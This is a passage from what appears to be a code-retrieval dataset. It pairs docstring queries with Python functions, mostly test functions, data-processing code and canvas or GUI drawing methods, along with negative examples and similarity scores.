df_tax_id.taxonomy:\n for name in row:\n if name not in taxonomies:\n biology_names.append(name)\n for biology_name in biology_names:\n for row in df_tax_id.taxonomy:\n if biology_name in row:\n row.remove(biology_name)\n # **------------for tax prediction---------------**\n df_tax_id.to_pickle(\"output_data/for_predict_doubletriple.pkl\")\n # **----------end tax prediction--------------**\n for ind, tax_list in enumerate(df_tax_id.taxonomy):\n if \"marine\" in tax_list:\n #print(ind, tax_list)\n if len(tax_list) > 1:\n df_tax_id.taxonomy[ind].remove(\"marine\")\n else:\n df_tax_id.taxonomy[ind].append(\"no\")\n df_tax_id.taxonomy[ind].remove(\"marine\")\n #df_tax_id.taxonomy[ind] = [\"no\"]\n taxonomy_Double = []\n taxonomy_Triple = []\n taxonomy_single_entry = []\n for ind, tax_list in enumerate(df_tax_id.taxonomy):\n #print(ind, tax_list)\n if len(tax_list) == 1:\n taxonomy_single_entry.append(tax_list[0])\n elif len(tax_list) == 2: \n taxonomy_single_entry.append('double')\n # save original annotation\n taxonomyDouble1 = []\n for tax in tax_list:\n taxonomyDouble1.append(tax)\n taxonomy_Double.append(taxonomyDouble1)\n elif len(tax_list) == 3:\n taxonomy_single_entry.append('triple')\n # save original annotation\n taxonomyTriple1 = []\n for tax in tax_list:\n taxonomyTriple1.append(tax)\n taxonomy_Triple.append(taxonomyTriple1)\n else:\n print('Error: Too many taxonomies for one aglycon','\\n','create a new elif statement in line 102 in tanimoto_index.py')\n df_tax_id_fromCompleteDatabank = pd.DataFrame({\"taxonomy\": taxonomy_single_entry,\n \"coconut_id\": df_five_tax.coconut_id})\n sweetcoconut_databank(df_tax_id_fromCompleteDatabank,taxonomy_Double,sweetcoconut_database,port)", "def test():\n\n # todo: using 'analysisname' for group by, I think I can also use 'File Number'\n statListDict = None # list of dict mapping human readbale to column names\n masterDf = None\n interfaceDefaults = None\n\n # machine learning db\n if 0:\n # this is from mac laptop\n #path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master.csv'\n path = '/Users/cudmore/data/laura-ephys/SANdatabaseForMachineLearning.xlsx'\n analysisName = 'File Number'\n #statListDict = None #sanpy.bAnalysisUtil.getStatList()\n categoricalList = ['LOCATION', 'SEX', 'File Number']#, 'File Name']\n hueTypes = ['LOCATION', 'SEX', 'File Number'] #, 'File Name'] #, 'None']\n sortOrder = ['LOCATION', 'SEX', 'File Number']\n\n # sanpy database\n if 0:\n #import sanpy\n #sys.path.append(os.path.join(os.path.dirname(sys.path[0]),'sanpy'))\n #import bAnalysisUtil\n #statListDict = bAnalysisUtil.statList\n import statlist\n statListDict = statlist.statList\n\n # this is from mac laptop\n #path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master.csv'\n path = '../examples/Superior vs Inferior database_master.csv'\n path = '/Users/cudmore/data/laura-ephys/Superior_Inferior_database_master_jan25.csv'\n path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master.csv'\n path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master_20210402.csv'\n\n #path = 'data/Superior vs Inferior database_master_20210402.csv'\n path = 'data/Superior vs Inferior database_master_20210402.csv'\n #path = '/Users/cudmore/data/laura-ephys/Superior_Inferior_database_master_jan25.csv'\n path = 'data/Superior vs Inferior database_13_Feb_master.csv'\n analysisName = 'analysisname'\n #statListDict = None #sanpy.bAnalysisUtil.getStatList()\n categoricalList = ['include', 'condition', 'region', 'Sex', 'RegSex', 'File Number', 'analysisname']#, 'File Name']\n hueTypes = ['region', 'sex', 'RegSex', 'condition', 'File Number', 'analysisname'] #, 'File Name'] #, 'None']\n sortOrder = ['region', 'sex', 'condition']\n\n interfaceDefaults = {'Y Statistic': 'Spike Frequency (Hz)',\n 'X Statistic': 'region',\n 'Hue': 'region',\n 'Group By': 'File Number'}\n # bimpy database\n if 0:\n path = '../examples/edges_db.csv'\n analysisName = 'fileNumber'\n categoricalList = ['san', 'region', 'path', 'file', 'fileNumber', 'nCon']\n hueTypes = categoricalList\n sortOrder = ['san', 'region']\n\n # dualAnalysis database\n if 0:\n # grab our list of dict mapping human readable to .csv column names\n sys.path.append(os.path.join(os.path.dirname(sys.path[0]),'sanpy'))\n import bAnalysisUtil\n statListDict = bAnalysisUtil.statList\n\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/dualAnalysis_final_db.csv'\n analysisName = 'fileNumber' # # rows in .xlsx database, one recording per row\n # trial is 1a/1b/1c... trial withing cellNumber\n categoricalList = ['include', 'region', 'fileNumber', 'cellNumber', 'trial', 'quality']\n hueTypes = categoricalList\n sortOrder = ['region']\n\n # sparkmaster lcr database\n if 0:\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/lcr-database.csv'\n analysisName = 'fileNumber' # # rows in .xlsx database, one recording per row\n # trial is 1a/1b/1c... trial withing cellNumber\n categoricalList = ['quality', 'region', 'fileNumber', 'dateFolder', 'tifFile']\n hueTypes = categoricalList\n sortOrder = ['region']\n\n # lcr/vm analysis using lcrPicker.py\n if 0:\n #basePath = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/'\n #path = basePath + 'dual-data/20210115/20210115__0002_lcrPicker.csv'\n #path = basePath + 'dual-data/20210115/20210115__0001_lcrPicker.csv'\n\n # output of lcrPicker.py ... mergeDatabase()\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/lcrPicker-db.csv'\n categoricalList = None\n hueTypes = None\n analysisName= 'tifFile'\n sortOrder = None\n\n # merged sanpy+lcr pre spike slope\n # generated by dualAnalysis.py xxx()\n # usnig to compare lcr slope to edddr for fig 9\n if 0:\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/combined-sanpy-lcr-db.csv'\n statListDict = None\n categoricalList = None\n hueTypes = None\n analysisName= 'filename'\n sortOrder = None\n\n if 1:\n path = 'data'\n ad = sanpy.analysisDir(path, autoLoad=True)\n for row in range(len(ad)):\n ad.getAnalysis(row)\n masterDf = ad.pool_build()\n categoricalList = ['file', 'File Number']\n hueTypes = ['file', 'File Number']\n analysisName = 'file'\n from sanpy.bAnalysisUtil import statList as statListDict\n sortOrder = ['file', 'File Number']\n interfaceDefaults = {'Y Statistic': 'Spike Frequency (Hz)',\n 'X Statistic': 'Spike Number',\n 'Hue': 'file',\n 'Group By': 'file'}\n\n #\n app = QtWidgets.QApplication(sys.argv)\n\n ex = bScatterPlotMainWindow(path, categoricalList, hueTypes,\n analysisName, sortOrder, statListDict=statListDict,\n masterDf = masterDf,\n interfaceDefaults = interfaceDefaults)\n ex.show()\n\n sys.exit(app.exec_())", "def test_gene_essentiality_from_data_qualitative(combined_dataframe):\n comparative_dataframe, exp = essential.prepare_qualitative_comparison(\n combined_dataframe\n )\n assert len(comparative_dataframe[comparative_dataframe[\"true_positives\"] == 1]) == 3", "def test_insert_domain_data_2(self):\n logging.info(\"test_insert_domain_data_2\")\n\n domain_data = test_data_utils.get_trixie_domain_data()\n statement1 = test_db_utils.domain_stmt(domain_data)\n # GeneID = \"TRIXIE_0001\"\n gene_domain_data = test_data_utils.get_trixie_gene_domain_data()\n statement2 = test_db_utils.gene_domain_stmt(gene_domain_data)\n statement3 = get_gene_update_statement(1, TRIXIE_GENEID)\n statements = [statement1, statement2, statement3]\n txns = [statements]\n find_domains.insert_domain_data(self.engine, txns)\n\n gene_domain_table_results = test_db_utils.get_data(test_db_utils.gene_domain_table_query)\n domain_table_results = test_db_utils.get_data(test_db_utils.domain_table_query)\n gene_table_results = test_db_utils.get_data(test_db_utils.gene_table_query)\n gene_table_dict = {}\n for dict in gene_table_results:\n gene_table_dict[dict[\"GeneID\"]] = dict\n\n domain_status = gene_table_dict[\"TRIXIE_0001\"][\"DomainStatus\"]\n d_rows = len(domain_table_results)\n gd_rows = len(gene_domain_table_results)\n\n with self.subTest():\n self.assertEqual(d_rows, 1)\n with self.subTest():\n self.assertEqual(gd_rows, 1)\n with self.subTest():\n self.assertEqual(domain_status, 1)", "def test_find_2018_cais_name_table23():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 23\n\n found_in_table_23, expected_in_table_23 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_23 == expected_in_table_23", "def test_find_2018_cais_name_table21():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 21\n\n found_in_table_21, expected_in_table_21 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_21 == expected_in_table_21", "def test_includes_two_new_datasets(self):\n new_datasets = factories.SourceDatasetFactory.create_batch(2, source_study_version=self.study_version_3)\n response = self.client.get(self.get_url(self.study.pk))\n context = response.context\n table = context['source_dataset_table']\n for new_dataset in new_datasets:\n self.assertIn(new_dataset, table.data)", "def test_create_occurrence(self):\n pass", "def test_find_2018_cais_name_table17():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 17\n\n found_in_table_17, expected_in_table_17 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_17 == expected_in_table_17", "def execute(self, context):\n if len(self.data_quality_checks) == 0:\n self.log.info('DataQualityOperator not implemented yet')\n return\n \n redshift_hook = PostgresHook(postgres_conn_id=self.redshift_conn_id) \n \n errors = 0\n failure_tests = []\n\n # process each sql stmt for data quality relevant to each dimension table:\n # Dimension tables : a. songplays, b. songs, c. artists, d. users, e. time\n \n for (curr_table, check_stmt) in zip(self.list_of_tables, self.data_quality_checks):\n curr_sql = check_stmt.get('check_sql')\n result1 = check_stmt.get('expected_result')\n \n self.log.info('Current Table Processed : ' + curr_table)\n\n try:\n records = redshift_hook.get_records(curr_sql)[0]\n except Exception as e:\n self.loginfo(f\"Error : {curr_table} : Query failed : {e}\")\n\n # record error when actual result is not the same as expected result\n if result1 != records[0]:\n errors += 1\n failure_tests.append(curr_table + ' : ' + curr_sql)\n \n # display Failure or Success Message \n if errors > 0:\n self.log.info(failure_tests)\n self.log.info('Failure Msg : Tests Failed')\n raise ValueError('Error : Failed : Data Quality check')\n else:\n self.log.info('Success : All Data Quality Tests passed')", "def test_find_2018_cais_name_table35():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 35\n\n found_in_table_35, expected_in_table_35 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_35 == expected_in_table_35", "def test_complete_data_schema(self):\n response = self.client.get(self.url)\n data = response.data\n self.assertIn('id', data)\n self.assertIn('title', data)\n self.assertIn('release_year', data)\n self.assertIn('casting', data)\n self.assertIn('directors', data)\n self.assertIn('producers', data)\n self.assertIn('roman_release_year', data)", "def testEquivalenceAfterRoundTrip(self):\n correct = 0\n for example in VALID_EXAMPLES:\n original_schema = schema.Parse(example.schema_string)\n round_trip_schema = schema.Parse(str(original_schema))\n if original_schema == round_trip_schema:\n correct += 1\n debug_msg = \"%s: ROUND TRIP SUCCESS\" % example.name\n else:\n debug_msg = \"%s: ROUND TRIP FAILURE\" % example.name\n self.fail(\n \"Round trip failure: %s, %s, %s\"\n % (example.name, original_schema, str(original_schema)))\n\n fail_msg = \"Round trip success on %d out of %d schemas\" % \\\n (correct, len(VALID_EXAMPLES))\n self.assertEqual(correct, len(VALID_EXAMPLES), fail_msg)", "def test_correct_labels(self):\n timeseries = self.build_timeseries()\n\n metric_labels_list = main.get_labels(timeseries[\"metric\"],\"labels\") \n expected_metric_labels_list = self.build_metric_labels()\n self.assertEqual(sorted(metric_labels_list), sorted(expected_metric_labels_list))\n\n resource_labels_list = main.get_labels(timeseries[\"resource\"],\"labels\")\n expected_resource_labels_list = self.build_resource_labels()\n self.assertEqual(sorted(resource_labels_list), sorted(expected_resource_labels_list))\n\n user_labels_list = main.get_labels(self.build_user_labels_request(),\"userLabels\")\n expected_user_labels_list = self.build_expected_user_labels_response()\n self.assertEqual(sorted(user_labels_list), sorted(expected_user_labels_list))\n\n system_labels_list = main.get_system_labels(self.build_user_labels_request(),\"systemLabels\")\n expected_system_labels_list = self.build_expected_system_labels_response()\n self.assertEqual(sorted(system_labels_list), sorted(expected_system_labels_list))", "def test_distances(self):\n sf = make_classifier_data(n=10, d=2, seed=37)\n sf.remove_column(\"class\", inplace=True)\n\n numeric_features = [\"int0\", \"int1\", \"float0\", \"float1\"]\n array_features = [\"array0\"]\n string_features = [\"str0\"]\n dict_features = [\"dict0\"]\n\n ## Numeric standard distances should work for numeric columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Numeric standard distances should work for array columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=array_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## String standard distances should work.\n for d in [\"levenshtein\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Dictionary standard distances should work.\n for d in [\"jaccard\", \"weighted_jaccard\", \"cosine\", \"transformed_dot_product\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n # Nonsensical combinations of feature types and distances should fail.\n with self.assertRaises(ValueError):\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=\"euclidean\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n # If no distance is specified, the automatic distance construction\n # should kick in and be correct.\n correct_dist = [\n [[\"str0\"], \"levenshtein\", 1],\n [[\"str1\"], \"levenshtein\", 1],\n [[\"dict0\"], \"jaccard\", 1],\n [[\"int0\", \"int1\", \"float0\", \"float1\"], \"euclidean\", 1],\n [[\"array0\"], \"euclidean\", 1],\n ]\n\n m = tc.dbscan.create(\n sf, radius=1, distance=None, min_core_neighbors=3, verbose=False\n )\n\n self.assertItemsEqual(m.distance, correct_dist)\n\n m = tc.dbscan.create(\n sf, radius=1, distance=\"auto\", min_core_neighbors=3, verbose=False\n )\n self.assertItemsEqual(m.distance, correct_dist)", "def test_index_includes_practice(self):\n self.normal_api.create(\n 'Practice',\n name=u'Indexed Practice',\n summary=u\"R\\xf8ckin'\",\n tags=['super', u'c\\xf8\\xf8l', 'tagone'],\n subjects=['math', 'history', 'reading'],\n min_grade=0,\n max_grade=13,\n type='text',\n body=u\"R\\xf8ckin'\",\n youtube_id='https://www.youtube.com/watch?v=6sJqTDaOrTg',\n has_files=True,\n pending=False,\n listed=True,\n )\n\n result_dicts = [util.search_document_to_dict(doc)\n for doc in self.search_index.get_range()]\n result_kinds = [Model.get_kind(d['uid']) for d in result_dicts]\n self.assertIn('Practice', result_kinds)", "def test_recognize_describe(self):\n pass", "def test_figure4(self):\n\n topics = get_topics('msmarco-passage-dev-subset')\n qrels = get_qrels('msmarco-passage-dev-subset')\n\n self.assertEqual(len(topics), 6980)\n self.assertEqual(len(qrels), 6980)\n\n # Compute the average length of queries:\n avg_qlen = sum([len(topics[t]['title'].split()) for t in topics])/len(topics)\n\n # Compute the average number of relevance judgments per query:\n avg_qrels = sum([len(qrels[t]) for t in topics])/len(topics)\n\n self.assertAlmostEqual(avg_qlen, 5.925, delta=0.001)\n self.assertAlmostEqual(avg_qrels, 1.065, delta=0.001)", "def test_mhr_document_type(session):\n results = type_tables.MhrDocumentType.find_all()\n assert results\n assert len(results) >= 55\n for result in results:\n assert result.document_type in type_tables.MhrDocumentTypes\n assert result.document_type_desc\n\n doc_result = type_tables.MhrDocumentType.find_by_doc_type(type_tables.MhrDocumentTypes.REG_101.value)\n assert doc_result\n assert doc_result.document_type == type_tables.MhrDocumentTypes.REG_101.value\n assert doc_result.document_type_desc == 'MANUFACTURED HOME REGISTRATION'\n assert doc_result.legacy_fee_code == 'MHR400'\n doc_result = type_tables.MhrDocumentType.find_by_doc_type('XXX')\n assert not doc_result", "def test_find_2018_cais_name_table13():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 13\n\n found_in_table_13, expected_in_table_13 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_13 == expected_in_table_13", "def test(client, config, sampling=100):\n\n # Retrieving MongoDB collection\n db=client[config.db]\n col=db[config.collection]\n\n sys.stderr.write(\"Starting minimal benchmark scenarios for testing purpose\\n\")\n\n run_search(col,\"TopDestForMktOriSMonth-%d\"%sampling,\"FR\",get_top_dest_for_market_and_origin_and_smonth(\"FR\",\"PAR\",\"2015-01\",sampling))\n run_search(col,\"TopOnDForMktSMonth-%d\"%sampling,\"FR\", get_top_ond_for_market_and_smonth(\"FR\",\"2015-01\",sampling))\n run_search(col,\"TopOnDForMktDMonth-%d\"%sampling,\"FR\", get_top_ond_for_market_and_dmonth(\"FR\",\"2015-10\",sampling))\n run_search(col,\"PerDDateForMktSMonth-%d\"%sampling,\"FR\", get_per_dep_date_for_market_and_smonth(\"FR\",\"2015-01\",sampling))\n run_search(col,\"PerSDateForMktDMonth-%d\"%sampling,\"FR\", get_per_search_date_for_market_and_dmonth(\"FR\",\"2015-10\",sampling))\n run_search(col,\"PerStayForMktOnDSMonth-%d\"%sampling,\"FR\", get_per_stay_for_market_and_ond_and_smonth(\"FR\",\"PAR\",\"NYC\",\"2015-01\",sampling))\n run_search(col,\"PerDDOWForMktCtries-%d\"%sampling,\"FR\",get_per_depdow_for_market_and_ctries(\"FR\",\"FR\",\"US\",sampling))\n\n sys.stderr.write(\"Minimal benchmark scenarios finished\\n\")", "def test_find_2018_cais_name_table14():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 14\n\n found_in_table_14, expected_in_table_14 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_14 == expected_in_table_14", "def test_execute_review_2(self):\n review.execute_review(self.alchemist, self.test_dir,\n self.review_test_dir.name,\n filters=(\"phage.Cluster='A' \"\n \"AND phage.Subcluster='A2'\"))\n\n self.assertTrue(self.review_test_dir.is_dir())", "def test_missing_data_sources(self):", "def test_get_df_db(oracle_connector):\n data_sources_spec = [\n {\n 'domain': 'Oracle test',\n 'type': 'external_database',\n 'name': 'my_oracle_sql_con',\n 'query': 'SELECT * FROM City;',\n }\n ]\n\n data_source = OracleSQLDataSource(**data_sources_spec[0])\n df = oracle_connector.get_df(data_source)\n\n assert not df.empty\n assert df.shape == (50, 5)\n assert set(df.columns) == {'ID', 'NAME', 'COUNTRYCODE', 'DISTRICT', 'POPULATION'}\n\n assert len(df[df['POPULATION'] > 500000]) == 5", "def test_9():\n table = pandas.read_csv('data/salary_in_various_regions.csv')\n query_result = show.show(table,\n metric='Salary(in $)' ,\n dimensions=['Resident City'] ,\n summary_operator=SummaryOperators.MEAN)\n print(query_result)\n expected_result = \"\"\" Resident City MEAN of Salary(in $)\n0 Chicago 1.658889e+05\n1 Palo Alto 3.033333e+04\n2 Washington 2.002740e+07\"\"\"\n\n expected_suggestions = \"[{'suggestion': 'Median is very different from the Mean', 'oversight': <Oversights.MEAN_VS_MEDIAN: 7>, 'is_row_level_suggestion': True, 'confidence_score': 3.1249999406334665, 'row_list': [{'row': 3, 'confidence_score': 3.1249999406334665}]}]\"\n\n assert(expected_result == query_result[0].to_string())\n assert(expected_suggestions == str(query_result[1]))" ]
[ "0.61581814", "0.60022753", "0.5817165", "0.5571238", "0.55539113", "0.54944795", "0.54687375", "0.5454587", "0.5425017", "0.5419371", "0.54093176", "0.54064757", "0.53786546", "0.5376907", "0.5369085", "0.53491753", "0.53406453", "0.53396004", "0.5316651", "0.5315632", "0.52647036", "0.5259786", "0.5213534", "0.52020866", "0.51928633", "0.51899886", "0.51895154", "0.5176623", "0.51749593", "0.5168549", "0.5158796", "0.51396424", "0.5137492", "0.5136301", "0.51309454", "0.5129353", "0.5127319", "0.5122721", "0.51169574", "0.5115569", "0.5107774", "0.5107061", "0.51064706", "0.510643", "0.51036155", "0.510052", "0.5097326", "0.5094514", "0.5092967", "0.50840443", "0.5082867", "0.50729406", "0.50727165", "0.5070588", "0.50705343", "0.50693166", "0.5068756", "0.50678766", "0.50672334", "0.5064154", "0.5062533", "0.5058465", "0.50539833", "0.50520813", "0.5050949", "0.50496435", "0.504924", "0.50478274", "0.5046457", "0.5038529", "0.50346947", "0.5034295", "0.5033025", "0.503236", "0.502734", "0.50260574", "0.50253874", "0.50234437", "0.5018503", "0.5013623", "0.50099844", "0.50080144", "0.5007222", "0.500457", "0.5004405", "0.50029165", "0.5002194", "0.5001717", "0.49986285", "0.499802", "0.499691", "0.4991123", "0.49905", "0.49873823", "0.498649", "0.49855527", "0.49846378", "0.4981249", "0.49797556", "0.49788144", "0.49731535" ]
0.0
-1
Implement your canvas drawing logic here, returning False will stop the rendering, returning True will continue it
def draw(self, canvas) -> bool: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw (self, screen):\n drew = bool(self.draw_fn(self, screen, self.dirty))\n self.dirty = False\n return drew", "def on_draw(self, widget, cr):\n #print \"starting to draw\"\n if self.double_buffer is not None:\n self.draw_tiles()\n cr.set_source_surface(self.double_buffer, 0.0, 0.0)\n cr.paint()\n else:\n print('Invalid double buffer')\n #print \"done drawing\"\n return False", "def draw_animation(self, canvas, animation_tick) -> bool:\n return False", "def on_draw_event(self, widget, ctx):\n # the _need_redraw flag doesnt work. it sometimes prevents\n # the rendering and leaving the canvas blank\n #if self._need_redraw:\n self._renderer.set_context(ctx)\n allocation = self.get_allocation()\n x, y, w, h = allocation.x, allocation.y, allocation.width, allocation.height\n self._render_figure(w, h)\n #self._need_redraw = False\n\n return False # finish event propagation?", "def draw():", "def paintGL(self):\n print \"Entereing paintGL\"\n if self.bDrawing == True:\n print \"Drawing was true so quit\"\n return\n \n \n self.bDrawing = True\n threadDrawGL = threading.Thread(target = self.drawGLScene)\n threadDrawGL.start()\n #self.drawGLScene()", "def _prepare_draw(self, view=None):\n return True", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n\n for row in self._board:\n for slot in row:\n if slot == 0:\n return False\n print \"It's a draw!\"\n return True", "def draw(self):\n\t\tpass", "def can_draw(self,point):\n if point <= 0:\n return False\n else:\n return True", "def draw(self):", "def draw (self):\n screen = self.screen\n dirty = False\n for display in self.displays:\n dirty |= display.draw(screen)\n return dirty", "def _draw(self, canvas, options):\n pass # must override in subclass", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self):\n return self._myCanvas.draw()", "def game_draw(self):\n pass", "def conditionsAreMetForDrawing(self):\n\t\tcurrentController = self.controller.view().window().windowController()\n\t\tif currentController:\n\t\t\ttool = currentController.toolDrawDelegate()\n\t\t\ttextToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolText\") )\n\t\t\thandToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolHand\") )\n\t\t\tif not textToolIsActive and not handToolIsActive: \n\t\t\t\treturn True\n\t\treturn False", "def draw(self):\r\n if not self.stopped:\r\n super().draw()\r\n self.next_frame()", "def draw(self, screen):", "def save_drawing_if_necessary(self):\n\n app_doc_data = AppDocData.instance()\n if app_doc_data.activeDrawing and app_doc_data.activeDrawing.modified:\n #if QMessageBox.Yes == QMessageBox.question(self, self.tr(\"Question\"),\n # self.tr(\"Do you want to save drawing?\"),\n # QMessageBox.Yes | QMessageBox.No):\n # self.actionSaveCliked()\n # return True\n if QMessageBox.Ignore == QMessageBox.question(self, self.tr('Continue?'),\n self.tr('Changes may not have been saved.'),\n QMessageBox.Ignore | QMessageBox.Cancel):\n return False\n return True", "def isOnCanvas(self, x, y):\n return 0 <= x < self.width and 0 <= y < self.height", "def draw (self):\n screen = self.screen\n dirty = False\n for z, displays in self.layers.iteritems():\n for display in displays:\n drew = display.draw(screen)\n # if made changes to the surface\n if drew:\n # set any displays that overlap this one dirty\n for d in display.overlapped:\n d.dirty = True\n dirty |= drew\n return dirty", "def on_draw(self):\n # draw everything", "def draw(self, surface):\n checked_color = (0, 196, 0) if self.checked else pg.Color(\"white\")\n surface.fill(pg.Color(\"black\"), self.rect)\n surface.fill(self.color, self.rect.inflate(-2,-2))\n surface.fill(pg.Color(\"white\"), self.rect.inflate(-6,-6))\n surface.fill((205,205,205), self.rect.inflate(-8,-8))\n surface.fill(checked_color, self.select_rect)", "def draw(self) -> Any:", "def _logic(self):\n yes = self.yes_button.was_pressed or self.yes_button.pressed\n no = self.no_button.was_pressed or self.no_button.pressed\n\n # render\n if self.render_timer.finished:\n # start = time()\n self.window_renderer.update(self.buffer_image.tobytes())\n # debug(\"render time: %s\", time() - start)\n self.render_timer.start()\n\n if self.state == STATE_DEFAULT:\n if (no and not self.disable_quit) or (no and yes):\n self._enter_state(STATE_EXIT_PROMPT)\n elif yes:\n self._enter_state(STATE_PREPARE)\n\n elif self.state == STATE_EXIT_PROMPT:\n if yes:\n return False\n elif no:\n self._enter_state(STATE_DEFAULT)\n\n elif self.state == STATE_PREPARE:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken = list()\n self.camera_controller.clear_workdir()\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PICTURE_COUNTDOWN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken.append(self.camera_controller.capture_photo())\n self._enter_state(STATE_PICTURE_TAKEN)\n else:\n self.window.find_by_name(NAME_GET_STARTED).text = \"\" \\\n + str(len(self.pictures_taken) + 1) + \" of \" + str(self.picture_count) \\\n + \"\\n\" + str(int(self.countdown_timer.remaining) + 1)\n\n elif self.state == STATE_PICTURE_TAKEN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n if len(self.pictures_taken) >= self.picture_count:\n t = threading.Thread(target=self._upload_to_twitter)\n t.start()\n self._enter_state(STATE_PRINT)\n else:\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PRINT:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif yes:\n self._enter_state(STATE_PRINTING)\n\n elif self.state == STATE_PRINTING:\n if no:\n self._enter_state(STATE_DEFAULT)\n else:\n strip_file = self.create_strip()\n args = self.print_command.replace('{filename}', strip_file).split()\n subprocess.Popen(args)\n self._enter_state(STATE_COMPLETED)\n\n elif self.state == STATE_COMPLETED:\n if yes or no or self.countdown_timer.finished:\n self._enter_state(STATE_DEFAULT)\n\n else:\n raise RuntimeError(\"The app is in an unknown state: \" + str(self.state))\n\n return True", "def drawCells(self):\r\n self.drawing = not self.drawing\r\n if self.drawing:\r\n self.draw_button['text'] = \"No Draw\"\r\n else:\r\n self.draw_button['text'] = \"Draw\"", "def draw_mode(self):\n self.can_draw = True\n timer_thread = threading.Thread(target=self.timer) # starting a timer\n timer_thread.daemon = True\n timer_thread.start()\n headline = Label(self.root2, text=self.username) # the name of the user on top of the screen.\n headline.pack()\n # change color button.\n red_button = Button(self.root2, command=lambda: self.change_color('red'), bg='red')\n red_button.place(x=450, y=20)\n\n word_label = Label(self.root2, text=\"you need to draw: \" + self.word)\n word_label.pack()\n\n score_headline = Label(self.root2, text='score: ' + str(self.score), font=('bubble', 15), # the score\n bg='white', fg=\"black\", relief=\"solid\") # the title of the screen.\n score_headline.place(x=10, y=50)\n\n # if left button on the mouse is being clicked, it goes to the function 'send_coordinates '.\n # self.cv.bind('<B1-Motion>', self.send_coordinates)\n self.cv.pack(expand=YES, fill=BOTH)\n server_handler = threading.Thread(target=self.paint, daemon=True)\n # creating a thread that handles with the data the server sends to the client, w function 'paint'.\n server_handler.start()\n self.root2.mainloop()", "def OnPaint(self, event):\r\n\r\n dc = wx.AutoBufferedPaintDC(self)\r\n if self._currentImage.IsOk() and self._valid:\r\n dc.DrawBitmap(self._currentImage, 0, 0, True)\r\n else:\r\n self.Draw(dc)", "def update(self):\n check_key_press = lambda key: self._window.was_key_pressed(key)\n frame = self._current_image.copy()\n\n for key, event in self._key_events.items():\n if check_key_press(key):\n event()\n\n for annotation in self._annotations:\n annotation.draw(frame)\n\n if self._annotation_in_progress is not None:\n self._annotation_in_progress.draw(frame)\n\n self.show_controls(frame)\n\n self._window.draw(frame)\n return not self._window.should_quit", "def pre_draw(self):", "def begin_draw(self):\n pygame.init()\n self.display = pygame.display.set_mode(self.disp_size)\n pygame.display.set_caption('Map Editing')\n font = pygame.font.SysFont(\"arial\", 15)\n strings = [\"Press ESC to Start Drawing Obstacles\",\n \"Click Left to Draw & Right to Erase\",\n \"To finish Drawing,press Escape \",\n \"During search, Escape or Close to Quit\",\n \"you can also draw during the search, but it won't ba saved\"]\n texts = 